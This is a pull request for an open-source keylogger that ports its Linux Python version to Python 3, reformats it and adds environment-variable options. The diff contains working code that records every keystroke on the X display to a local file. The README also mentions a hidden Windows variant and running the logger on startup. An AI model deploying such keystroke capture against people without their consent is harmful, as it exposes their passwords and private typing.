### PR TITLE
Python3 compatibility, Pep8 formatting, Environment variable options.

### DIFF
--- a/README.md
+++ b/README.md
@@ -3,11 +3,11 @@
 
 [Keylogger wiki](https://github.com/GiacomoLaw/Keylogger/wiki)
 
-Welcome to the simple keylogger repo! A keylogger is a program that records your keystrokes, and this program saves them in a log file on your local computer. 
+Welcome to the simple keylogger repo! A keylogger is a program that records your keystrokes, and this program saves them in a log file on your local computer.
 
 Check out below to learn how to install them. These keyloggers are simple and bare bones, however they work great! Feel free to fork and improve it if you want. Be sure to check out the [pull requests](https://github.com/GiacomoLaw/Keylogger/pulls) to see if your problem has been fixed, or to help out others.
 
-Currently, there are three keylogger programs for the major operating systems; Windows, Mac and Linux. 
+Currently, there are three keylogger programs for the major operating systems; Windows, Mac and Linux.
 
 ## Windows
 Simply compile into an .exe, and then run. Visual Studio is good for this.
@@ -15,7 +15,7 @@ Simply compile into an .exe, and then run. Visual Studio is good for this.
 There are two files; klog_visible and klog_invisible. It is pretty simple, but I will expand:
 
 - `klog_invisible` makes the window of the logger disappear, and it also starts up hidden from view. Note that it is still visible in the task manager.
-- `klog_visible` is visible, and the window does not close when typing. Great for testing it out. 
+- `klog_visible` is visible, and the window does not close when typing. Great for testing it out.
 
 Both of these save the keystrokes to a .txt file when closed.
 
@@ -56,6 +56,12 @@ Thanks to Casey Scarborough for the base program!
 ### Installation
 You'll need to install python-xlib if you don't have it.
 
+You can install it using `pip`:
+
+`pip install python-xlib`
+
+...or your system package manager:
+
 `sudo apt-get install python-xlib`
 
 Check that you have git installed, and then run this.
@@ -66,17 +72,40 @@ This will clone this entire repo. Find the linux folder, extract it, and open it
 
 `giacomo@vostro:~$ cd linux-logger/`
 
-Set where you want the log to go **before** running this step.
+### Options
+There are several options that can be set with environment variables:
 
-`giacomo@vostro:~/linux-logger$ python keylogger.py`
+- `pylogger_file`: File path to use as the log file.
+Default: `~/Desktop/file.log`
+- `pylogger_cancel`: The key to use as the cancel key, in character form.
+Default: \`
+- `pylogger_clean`: Whether to clear the file on startup. This can be set to anything to clear the file.
+Default: No (not set)
 
-`<class 'Xlib.protocol.request.QueryExtension'>`
+### Running
 
-`<class 'Xlib.protocol.request.QueryExtension'>`
+You can use Python 2 or 3 to run the logger.
 
-`RECORD extension version 1.13`
+To run it:
+```
+$ python keylogger.py
+<class 'Xlib.protocol.request.QueryExtension'>
+<class 'Xlib.protocol.request.QueryExtension'>
+RECORD extension version 1.13
+```
 
-The keylogger is now running! It will log your strokes to the file you specified. Stop it by hitting the grave key. Thats the one under escape on a standard keyboard.
+Or, using the options mentioned above:
+```bash
+# This tells the logger to use /home/me/myfile.txt,
+# clearing the file on startup, and using ! as the
+# cancel key.
+# You don't have to use all of these options at once, or any at all.
+$ pylogger_file="/home/me/myfile.txt" pylogger_clean=1 pylogger_cancel="!" python keylogger.py
+```
+
+The keylogger is now running! It will log your strokes to the file you
+specified. Stop it by hitting the cancel key (grave or \`, if not set with
+`pylogger_cancel`. Thats the one under escape on a standard keyboard.)
 
 You can make it run on startup:
 
@@ -93,7 +122,7 @@ Some uses of a keylogger are:
 - School/Institutions: Track keystrokes and log banned words in a file.
 - Personal Control and File Backup: Make sure no one is using your computer when you are away.
 - Parental Control: Track what your children are doing.
-- Self analysis 
+- Self analysis
 
 ---
 

--- a/linux/keylogger.py
+++ b/linux/keylogger.py
@@ -1,19 +1,51 @@
+#!/usr/bin/env python
+import os
 import pyxhook
 
-# This tells the keylogger where the log file will go (where characters are logged). Change it as is needed.
-# Change `your_username` to your account name.
-log_file = '/home/your_username/Desktop/file.log'
+# This tells the keylogger where the log file will go.
+# You can set the file path as an environment variable ('pylogger_file'),
+# or use the default ~/Desktop/file.log
+log_file = os.environ.get(
+    'pylogger_file',
+    os.path.expanduser('~/Desktop/file.log')
+)
+
+# Allow setting the cancel key from environment args, Default: `
+cancel_key = ord(
+    os.environ.get(
+        'pylogger_cancel',
+        '`'
+    )[0]
+)
+
+# Allow clearing the log file on start, if pylogger_clean is defined.
+if os.environ.get('pylogger_clean', None) is not None:
+    try:
+        os.remove(log_file)
+    except EnvironmentError:
+        # File does not exist, or no permissions.
+        pass
 
 
 def OnKeyPress(event):
-    fob = open(log_file, 'a')
-    fob.write(event.Key)
-    fob.write('\n')
-    if event.Ascii == 96:
-        fob.close()
+    with open(log_file, 'a') as f:
+        f.write('{}\n'.format(event.Key))
+
+    if event.Ascii == cancel_key:
         new_hook.cancel()
+
 
 new_hook = pyxhook.HookManager()
 new_hook.KeyDown = OnKeyPress
 new_hook.HookKeyboard()
-new_hook.start()
+try:
+    new_hook.start()
+except KeyboardInterrupt:
+    # User cancelled from command line.
+    pass
+except Exception as ex:
+    # Write exceptions to the log file, for analysis later.
+    msg = 'Error while catching events:\n  {}'.format(ex)
+    pyxhook.print_err(msg)
+    with open(log_file, 'a') as f:
+        f.write('\n{}'.format(msg))

--- a/linux/pyxhook.py
+++ b/linux/pyxhook.py
@@ -1,11 +1,12 @@
-#!/usr/bin/python
+#!/usr/bin/env python
 # modified version of pyxhook.py
+# Reformatted/modified to work with Python 3+.
 # pyxhook -- an extension to emulate some of the PyHook library on linux.
 #
 #    Copyright (C) 2008 Tim Alexander <dragonfyre13@gmail.com>
 #
 #    View the repo: https://github.com/JeffHoogland/pyxhook
-#    
+#
 #    This program is free software; you can redistribute it and/or modify
 #    it under the terms of the GNU General Public License as published by
 #    the Free Software Foundation; either version 2 of the License, or
@@ -29,32 +30,46 @@
 #
 #    This requires:
 #    at least python-xlib 1.4
-#    xwindows must have the "record" extension present, and active.
+#    xwindows must have the 'record' extension present, and active.
 #
 #    This file has now been somewhat extensively modified by
 #    Daniel Folkinshteyn <nanotube@users.sf.net>
 #    So if there are any bugs, they are probably my fault. :)
+from __future__ import print_function
 
 import sys
-import os
 import re
 import time
 import threading
 
-from Xlib import X, XK, display, error
+from Xlib import X, XK, display, error  # noqa
 from Xlib.ext import record
 from Xlib.protocol import rq
 
 #######################################################################
-########################START CLASS DEF################################
+# ######################START CLASS DEF################################
 #######################################################################
 
-class HookManager(threading.Thread):
-    """This is the main class. Instantiate it, and you can hand it KeyDown and KeyUp (functions in your own code) which execute to parse the pyxhookkeyevent class that is returned.
 
-    This simply takes these two values for now:
-    KeyDown = The function to execute when a key is pressed, if it returns anything. It hands the function an argument that is the pyxhookkeyevent class.
-    KeyUp = The function to execute when a key is released, if it returns anything. It hands the function an argument that is the pyxhookkeyevent class.
+def print_err(*args, **kwargs):
+    """ A wrapper for print() that uses stderr by default. """
+    if kwargs.get('file', None) is None:
+        kwargs['file'] = sys.stderr
+    print(*args, **kwargs)
+
+
+class HookManager(threading.Thread):
+    """ This is the main class. Instantiate it, and you can hand it KeyDown
+        and KeyUp (functions in your own code) which execute to parse the
+        PyxHookKeyEvent class that is returned.
+
+        This simply takes these two values for now:
+        KeyDown = The function to execute when a key is pressed, if it returns
+        anything. It hands the function an argument that is the
+        PyxHookKeyEvent class.
+        KeyUp = The function to execute when a key is released, if it returns
+        anything. It hands the function an argument that is the
+        PyxHookKeyEvent class.
     """
 
     def __init__(self):
@@ -64,12 +79,25 @@ class HookManager(threading.Thread):
         # Give these some initial values
         self.mouse_position_x = 0
         self.mouse_position_y = 0
-        self.ison = {"shift":False, "caps":False}
+        self.ison = {'shift': False, 'caps': False}
 
         # Compile our regex statements.
         self.isshift = re.compile('^Shift')
         self.iscaps = re.compile('^Caps_Lock')
-        self.shiftablechar = re.compile('^[a-z0-9]$|^minus$|^equal$|^bracketleft$|^bracketright$|^semicolon$|^backslash$|^apostrophe$|^comma$|^period$|^slash$|^grave$')
+        self.shiftablechar = re.compile('|'.join((
+            '^[a-z0-9]$',
+            '^minus$',
+            '^equal$',
+            '^bracketleft$',
+            '^bracketright$',
+            '^semicolon$',
+            '^backslash$',
+            '^apostrophe$',
+            '^comma$',
+            '^period$',
+            '^slash$',
+            '^grave$'
+        )))
         self.logrelease = re.compile('.*')
         self.isspace = re.compile('^space$')
 
@@ -79,7 +107,7 @@ class HookManager(threading.Thread):
         self.MouseAllButtonsDown = lambda x: True
         self.MouseAllButtonsUp = lambda x: True
 
-        self.contextEventMask = [X.KeyPress,X.MotionNotify]
+        self.contextEventMask = [X.KeyPress, X.MotionNotify]
 
         # Hook to our display.
         self.local_dpy = display.Display()
@@ -87,30 +115,35 @@ class HookManager(threading.Thread):
 
     def run(self):
         # Check if the extension is present
-        if not self.record_dpy.has_extension("RECORD"):
-            print "RECORD extension not found"
+        if not self.record_dpy.has_extension('RECORD'):
+            print_err('RECORD extension not found')
             sys.exit(1)
         r = self.record_dpy.record_get_version(0, 0)
-        print "RECORD extension version %d.%d" % (r.major_version, r.minor_version)
+        print_err('RECORD extension version {}.{}'.format(
+            r.major_version,
+            r.minor_version
+        ))
 
         # Create a recording context; we only want key and mouse events
         self.ctx = self.record_dpy.record_create_context(
-                0,
-                [record.AllClients],
-                [{
-                        'core_requests': (0, 0),
-                        'core_replies': (0, 0),
-                        'ext_requests': (0, 0, 0, 0),
-                        'ext_replies': (0, 0, 0, 0),
-                        'delivered_events': (0, 0),
-                        'device_events': tuple(self.contextEventMask), #(X.KeyPress, X.ButtonPress),
-                        'errors': (0, 0),
-                        'client_started': False,
-                        'client_died': False,
-                }])
+            0,
+            [record.AllClients],
+            [{
+                'core_requests': (0, 0),
+                'core_replies': (0, 0),
+                'ext_requests': (0, 0, 0, 0),
+                'ext_replies': (0, 0, 0, 0),
+                'delivered_events': (0, 0),
+                #                (X.KeyPress, X.ButtonPress),
+                'device_events': tuple(self.contextEventMask),
+                'errors': (0, 0),
+                'client_started': False,
+                'client_died': False,
+            }]
+        )
 
-        # Enable the context; this only returns after a call to record_disable_context,
-        # while calling the callback function in the meantime
+        # Enable the context; this only returns after a call to record_disable
+        # context, while calling the callback function in the meantime
         self.record_dpy.record_enable_context(self.ctx, self.processevents)
         # Finally free the context
         self.record_dpy.record_free_context(self.ctx)
@@ -121,35 +154,46 @@ class HookManager(threading.Thread):
         self.local_dpy.flush()
 
     def printevent(self, event):
-        print event
+        print(event)
 
     def HookKeyboard(self):
-        pass
         # We don't need to do anything here anymore, since the default mask
         # is now set to contain X.KeyPress
-        #self.contextEventMask[0] = X.KeyPress
+        # self.contextEventMask[0] = X.KeyPress
+        pass
 
     def HookMouse(self):
-        pass
         # We don't need to do anything here anymore, since the default mask
         # is now set to contain X.MotionNotify
 
-        # need mouse motion to track pointer position, since ButtonPress events
-        # don't carry that info.
-        #self.contextEventMask[1] = X.MotionNotify
+        # need mouse motion to track pointer position, since ButtonPress
+        # events don't carry that info.
+        # self.contextEventMask[1] = X.MotionNotify
+        pass
 
     def processevents(self, reply):
         if reply.category != record.FromServer:
             return
         if reply.client_swapped:
-            print "* received swapped protocol data, cowardly ignored"
+            print_err('* received swapped protocol data, cowardly ignored')
             return
-        if not len(reply.data) or ord(reply.data[0]) < 2:
+        try:
+            # Python 2
+            intval = ord(reply.data[0])
+        except TypeError:
+            # Python 3.
+            intval = reply.data[0]
+        if (not reply.data) or (intval < 2):
             # not an event
             return
         data = reply.data
         while len(data):
-            event, data = rq.EventField(None).parse_binary_value(data, self.record_dpy.display, None, None)
+            event, data = rq.EventField(None).parse_binary_value(
+                data,
+                self.record_dpy.display,
+                None,
+                None
+            )
             if event.type == X.KeyPress:
                 hookevent = self.keypressevent(event)
                 self.KeyDown(hookevent)
@@ -163,38 +207,47 @@ class HookManager(threading.Thread):
                 hookevent = self.buttonreleaseevent(event)
                 self.MouseAllButtonsUp(hookevent)
             elif event.type == X.MotionNotify:
-                # use mouse moves to record mouse position, since press and release events
-                # do not give mouse position info (event.root_x and event.root_y have
-                # bogus info).
+                # use mouse moves to record mouse position, since press and
+                # release events
+                # do not give mouse position info
+                # (event.root_x and event.root_y have bogus info).
                 self.mousemoveevent(event)
 
-        #print "processing events...", event.type
+        # print('processing events...', event.type)
 
     def keypressevent(self, event):
-        matchto = self.lookup_keysym(self.local_dpy.keycode_to_keysym(event.detail, 0))
-        if self.shiftablechar.match(self.lookup_keysym(self.local_dpy.keycode_to_keysym(event.detail, 0))): ## This is a character that can be typed.
-            if self.ison["shift"] == False:
+        matchto = self.lookup_keysym(
+            self.local_dpy.keycode_to_keysym(event.detail, 0)
+        )
+        if self.shiftablechar.match(
+                self.lookup_keysym(
+                    self.local_dpy.keycode_to_keysym(event.detail, 0))):
+            # This is a character that can be typed.
+            if not self.ison['shift']:
                 keysym = self.local_dpy.keycode_to_keysym(event.detail, 0)
                 return self.makekeyhookevent(keysym, event)
             else:
                 keysym = self.local_dpy.keycode_to_keysym(event.detail, 1)
                 return self.makekeyhookevent(keysym, event)
-        else: ## Not a typable character.
+        else:
+            # Not a typable character.
             keysym = self.local_dpy.keycode_to_keysym(event.detail, 0)
             if self.isshift.match(matchto):
-                self.ison["shift"] = self.ison["shift"] + 1
+                self.ison['shift'] = self.ison['shift'] + 1
             elif self.iscaps.match(matchto):
-                if self.ison["caps"] == False:
-                    self.ison["shift"] = self.ison["shift"] + 1
-                    self.ison["caps"] = True
-                if self.ison["caps"] == True:
-                    self.ison["shift"] = self.ison["shift"] - 1
-                    self.ison["caps"] = False
+                if not self.ison['caps']:
+                    self.ison['shift'] = self.ison['shift'] + 1
+                    self.ison['caps'] = True
+                if self.ison['caps']:
+                    self.ison['shift'] = self.ison['shift'] - 1
+                    self.ison['caps'] = False
             return self.makekeyhookevent(keysym, event)
 
     def keyreleaseevent(self, event):
-        if self.shiftablechar.match(self.lookup_keysym(self.local_dpy.keycode_to_keysym(event.detail, 0))):
-            if self.ison["shift"] == False:
+        if self.shiftablechar.match(
+                self.lookup_keysym(
+                    self.local_dpy.keycode_to_keysym(event.detail, 0))):
+            if not self.ison['shift']:
                 keysym = self.local_dpy.keycode_to_keysym(event.detail, 0)
             else:
                 keysym = self.local_dpy.keycode_to_keysym(event.detail, 1)
@@ -202,39 +255,26 @@ class HookManager(threading.Thread):
             keysym = self.local_dpy.keycode_to_keysym(event.detail, 0)
         matchto = self.lookup_keysym(keysym)
         if self.isshift.match(matchto):
-            self.ison["shift"] = self.ison["shift"] - 1
+            self.ison['shift'] = self.ison['shift'] - 1
         return self.makekeyhookevent(keysym, event)
 
     def buttonpressevent(self, event):
-        #self.clickx = self.rootx
-        #self.clicky = self.rooty
         return self.makemousehookevent(event)
 
     def buttonreleaseevent(self, event):
-        #if (self.clickx == self.rootx) and (self.clicky == self.rooty):
-            ##print "ButtonClick " + str(event.detail) + " x=" + str(self.rootx) + " y=" + str(self.rooty)
-            #if (event.detail == 1) or (event.detail == 2) or (event.detail == 3):
-                #self.captureclick()
-        #else:
-            #pass
-
         return self.makemousehookevent(event)
-
-        #    sys.stdout.write("ButtonDown " + str(event.detail) + " x=" + str(self.clickx) + " y=" + str(self.clicky) + "\n")
-        #    sys.stdout.write("ButtonUp " + str(event.detail) + " x=" + str(self.rootx) + " y=" + str(self.rooty) + "\n")
-        #sys.stdout.flush()
 
     def mousemoveevent(self, event):
         self.mouse_position_x = event.root_x
         self.mouse_position_y = event.root_y
 
-    # need the following because XK.keysym_to_string() only does printable chars
-    # rather than being the correct inverse of XK.string_to_keysym()
+    # need the following because XK.keysym_to_string() only does printable
+    # chars rather than being the correct inverse of XK.string_to_keysym()
     def lookup_keysym(self, keysym):
         for name in dir(XK):
-            if name.startswith("XK_") and getattr(XK, name) == keysym:
-                return name.lstrip("XK_")
-        return "[%d]" % keysym
+            if name.startswith('XK_') and getattr(XK, name) == keysym:
+                return name.lstrip('XK_')
+        return '[{}]'.format(keysym)
 
     def asciivalue(self, keysym):
         asciinum = XK.string_to_keysym(self.lookup_keysym(keysym))
@@ -246,31 +286,46 @@ class HookManager(threading.Thread):
     def makekeyhookevent(self, keysym, event):
         storewm = self.xwindowinfo()
         if event.type == X.KeyPress:
-            MessageName = "key down"
+            MessageName = 'key down'
         elif event.type == X.KeyRelease:
-            MessageName = "key up"
-        return pyxhookkeyevent(storewm["handle"], storewm["name"], storewm["class"], self.lookup_keysym(keysym), self.asciivalue(keysym), False, event.detail, MessageName)
+            MessageName = 'key up'
+        return PyxHookKeyEvent(
+            storewm['handle'],
+            storewm['name'],
+            storewm['class'],
+            self.lookup_keysym(keysym),
+            self.asciivalue(keysym),
+            False,
+            event.detail,
+            MessageName
+        )
 
     def makemousehookevent(self, event):
         storewm = self.xwindowinfo()
         if event.detail == 1:
-            MessageName = "mouse left "
+            MessageName = 'mouse left '
         elif event.detail == 3:
-            MessageName = "mouse right "
+            MessageName = 'mouse right '
         elif event.detail == 2:
-            MessageName = "mouse middle "
+            MessageName = 'mouse middle '
         elif event.detail == 5:
-            MessageName = "mouse wheel down "
+            MessageName = 'mouse wheel down '
         elif event.detail == 4:
-            MessageName = "mouse wheel up "
+            MessageName = 'mouse wheel up '
         else:
-            MessageName = "mouse " + str(event.detail) + " "
+            MessageName = 'mouse {} '.format(event.detail)
 
         if event.type == X.ButtonPress:
-            MessageName = MessageName + "down"
+            MessageName = '{}down'.format(MessageName)
         elif event.type == X.ButtonRelease:
-            MessageName = MessageName + "up"
-        return pyxhookmouseevent(storewm["handle"], storewm["name"], storewm["class"], (self.mouse_position_x, self.mouse_position_y), MessageName)
+            MessageName = '{}up'.format(MessageName)
+        return PyxHookMouseEvent(
+            storewm['handle'],
+            storewm['name'],
+            storewm['class'],
+            (self.mouse_position_x, self.mouse_position_y),
+            MessageName
+        )
 
     def xwindowinfo(self):
         try:
@@ -279,23 +334,26 @@ class HookManager(threading.Thread):
             wmclass = windowvar.get_wm_class()
             wmhandle = str(windowvar)[20:30]
         except:
-            ## This is to keep things running smoothly. It almost never happens, but still...
-            return {"name":None, "class":None, "handle":None}
-        if (wmname == None) and (wmclass == None):
+            # This is to keep things running smoothly.
+            # It almost never happens, but still...
+            return {'name': None, 'class': None, 'handle': None}
+        if (wmname is None) and (wmclass is None):
             try:
                 windowvar = windowvar.query_tree().parent
                 wmname = windowvar.get_wm_name()
                 wmclass = windowvar.get_wm_class()
                 wmhandle = str(windowvar)[20:30]
             except:
-                ## This is to keep things running smoothly. It almost never happens, but still...
-                return {"name":None, "class":None, "handle":None}
-        if wmclass == None:
-            return {"name":wmname, "class":wmclass, "handle":wmhandle}
+                # This is to keep things running smoothly.
+                # It almost never happens, but still...
+                return {'name': None, 'class': None, 'handle': None}
+        if wmclass is None:
+            return {'name': wmname, 'class': wmclass, 'handle': wmhandle}
         else:
-            return {"name":wmname, "class":wmclass[0], "handle":wmhandle}
+            return {'name': wmname, 'class': wmclass[0], 'handle': wmhandle}
 
-class pyxhookkeyevent:
+
+class PyxHookKeyEvent(object):
     """This is the class that is returned with each key event.f
     It simply creates the variables below in the class.
 
@@ -303,13 +361,18 @@ class pyxhookkeyevent:
     WindowName = The name of the window.
     WindowProcName = The backend process for the window.
     Key = The key pressed, shifted to the correct caps value.
-    Ascii = An ascii representation of the key. It returns 0 if the ascii value is not between 31 and 256.
-    KeyID = This is just False for now. Under windows, it is the Virtual Key Code, but that's a windows-only thing.
-    ScanCode = Please don't use this. It differs for pretty much every type of keyboard. X11 abstracts this information anyway.
-    MessageName = "key down", "key up".
+    Ascii = An ascii representation of the key. It returns 0 if the ascii
+    value is not between 31 and 256.
+    KeyID = This is just False for now. Under windows, it is the Virtual Key
+    Code, but that's a windows-only thing.
+    ScanCode = Please don't use this. It differs for pretty much every type of
+    keyboard. X11 abstracts this information anyway.
+    MessageName = 'key down', 'key up'.
     """
 
-    def __init__(self, Window, WindowName, WindowProcName, Key, Ascii, KeyID, ScanCode, MessageName):
+    def __init__(
+            self, Window, WindowName, WindowProcName, Key, Ascii, KeyID,
+            ScanCode, MessageName):
         self.Window = Window
         self.WindowName = WindowName
         self.WindowProcName = WindowProcName
@@ -320,9 +383,19 @@ class pyxhookkeyevent:
         self.MessageName = MessageName
 
     def __str__(self):
-        return "Window Handle: " + str(self.Window) + "\nWindow Name: " + str(self.WindowName) + "\nWindow's Process Name: " + str(self.WindowProcName) + "\nKey Pressed: " + str(self.Key) + "\nAscii Value: " + str(self.Ascii) + "\nKeyID: " + str(self.KeyID) + "\nScanCode: " + str(self.ScanCode) + "\nMessageName: " + str(self.MessageName) + "\n"
+        return '\n'.join((
+            'Window Handle: {s.Window}',
+            'Window Name: {s.WindowName}',
+            'Window\'s Process Name: {s.WindowProcName}',
+            'Key Pressed: {s.Key}',
+            'Ascii Value: {s.Ascii}',
+            'KeyID: {s.KeyID}',
+            'ScanCode: {s.ScanCode}',
+            'MessageName: {s.MessageName}',
+        )).format(s=self)
 
-class pyxhookmouseevent:
+
+class PyxHookMouseEvent:
     """This is the class that is returned with each key event.f
     It simply creates the variables below in the class.
 
@@ -330,10 +403,11 @@ class pyxhookmouseevent:
     WindowName = The name of the window.
     WindowProcName = The backend process for the window.
     Position = 2-tuple (x,y) coordinates of the mouse click
-    MessageName = "mouse left|right|middle down", "mouse left|right|middle up".
+    MessageName = 'mouse left|right|middle down', 'mouse left|right|middle up'
     """
 
-    def __init__(self, Window, WindowName, WindowProcName, Position, MessageName):
+    def __init__(
+            self, Window, WindowName, WindowProcName, Position, MessageName):
         self.Window = Window
         self.WindowName = WindowName
         self.WindowProcName = WindowProcName
@@ -341,10 +415,16 @@ class pyxhookmouseevent:
         self.MessageName = MessageName
 
     def __str__(self):
-        return "Window Handle: " + str(self.Window) + "\nWindow Name: " + str(self.WindowName) + "\nWindow's Process Name: " + str(self.WindowProcName) + "\nPosition: " + str(self.Position) + "\nMessageName: " + str(self.MessageName) + "\n"
+        return '\n'.join((
+            'Window Handle: {s.Window}',
+            'Window\'s Process Name: {s.WindowProcName}',
+            'Position: {s.Position}',
+            'MessageName: {s.MessageName}',
+        )).format(s=self)
+
 
 #######################################################################
-#########################END CLASS DEF#################################
+# ########################END CLASS DEF################################
 #######################################################################
 
 if __name__ == '__main__':


### PR DESCRIPTION
This PR allows the linux version of KeyLogger to run on Python 2 or 3.
The code was reformatted in [Pep8](https://www.python.org/dev/peps/pep-0008/) style to help with readability.
Three environment variables are checked so options can be set:
- `pylogger_file`: Sets the file path for the logger. Defaults to: `~/Desktop/file.log`
- `pylogger_cancel`: Sets the cancel key for the logger. Defaults to: \`
- `pylogger_clean`: Determines whether the log file should be cleared at the start. Defaults to: `No` (`not set`)

Example usage of environment variables:
```bash
# Tells the keylogger to clear the log file, by simply setting pylogger_clean to anything.
# Tells the keylogger to use ! as the cancel key, by setting pylogger_cancel to "!"
# Tells the keylogger to use /home/cj/myfile.txt as the log file by setting pylogger_file.
pylogger_clean=1 pylogger_cancel='!' pylogger_file="/home/cj/myfile.txt" python3 ./keylogger.py
```

If `keylogger.py` is made executable (`chmod +x keylogger.py`), you can drop the `python3` part:
```bash
pylogger_file="/home/cj/myfile.txt" ./keylogger.py
```

By prepending the environment variables to the command, it sets the variable for that command's subshell only. They can be set permanently by putting them in `.bashrc`.

These options could just as well be implemented using command-line options, but I thought the argument parsing might add too much code (even though [docopt](http://docopt.org/) only takes one line after you define the usage string).